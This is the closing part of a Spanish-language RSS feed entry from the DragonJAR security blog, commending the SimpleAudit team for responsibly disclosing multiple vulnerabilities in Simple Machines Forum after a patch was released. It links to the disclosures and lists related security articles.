<p>Desde la comunidad DragonJAR enviamos un saludo a los integrantes del equipo <a rel="nofollow" target="_blank" href="http://twitter.com/simpleaudit">SimpleAudit</a> no solo por los fallos encontrados, sino por la publicación responsable de ellos, esperando que <a rel="nofollow" target="_blank" href="http://www.simplemachines.org/community/index.php?topic=351341.0">SMF publicara una versión parcheada</a> de su software para hacer el <a rel="nofollow" target="_blank" href="http://seclists.org/fulldisclosure/2009/Dec/24">Full Disclosure</a>.</p>
<p>Cada uno de los fallos encontrados en SMF han sido publicados y explicados <a rel="nofollow" target="_blank" href="http://foro.elhacker.net/nivel_web/auditoria_de_seguridad_hacia_simple_machines_forum_20-t271199.0.html">en el foro de ElHacker.net</a> por <a rel="nofollow" target="_blank" href="http://twitter.com/WHK_">WHK</a>, ademas en nuestro idioma.</p>
<p><strong>Mas Información:</strong><br />
<a rel="nofollow" target="_blank" href="http://labs.elhacker.net/simpleaudit">Pagina del Proyecto</a><br />
<a rel="nofollow" target="_blank" href="http://foro.elhacker.net/nivel_web/auditoria_de_seguridad_hacia_simple_machines_forum_20-t271199.0.html">Anuncio en el Foro</a><br />
<a rel="nofollow" target="_blank" href="http://seclists.org/fulldisclosure/2009/Dec/24">Full Disclosure</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/vulnerabilidad-xss-8-millones-aplicaciones-flash.xhtml" title="Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash">Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash</a></li><li><a href="http://www.dragonjar.org/wapiti-escaner-vulnerabilidades-aplicaciones-web.xhtml" title="Wapiti &#8211; Escaner de Vulnerabilidades en Aplicaciones Web">Wapiti &#8211; Escaner de Vulnerabilidades en Aplicaciones Web</a></li><li><a href="http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml" title="XSS que permite postear a atacante registrado en WordPress">XSS que permite postear a atacante registrado en WordPress</a></li><li><a href="http://www.dragonjar.org/parches-para-windows-corrigen-vulnerabilidades-criticas.xhtml" title="Parches para Windows que corrigen Vulnerabilidades Criticas">Parches para Windows que corrigen Vulnerabilidades Criticas</a></li><li><a href="http://www.dragonjar.org/criterios-para-la-evaluacion-de-los-escaners-de-seguridad-web.xhtml" title="Criterios para la Evaluación de los Escaners de Seguridad Web">Criterios para la Evaluación de los Escaners de Seguridad Web</a></li><li><a href="http://www.dragonjar.org/bug-quick-question-joomla.xhtml" title="Bug en el modulo Quick Question de Joomla">Bug en el modulo Quick Question de Joomla</a></li><li><a href="http://www.dragonjar.org/xss-en-wordpress-2-8-1-actualiza-a-wordpress-2-8-2.xhtml" title="XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2">XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2</a></li><li><a href="http://www.dragonjar.org/descargar-gratis-internet-explorer-8-final.xhtml" title="Descargar Gratis Internet Explorer 8 Final">Descargar Gratis Internet Explorer 8 Final</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/multiples-vulnerabilidades-smf.xhtml/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>
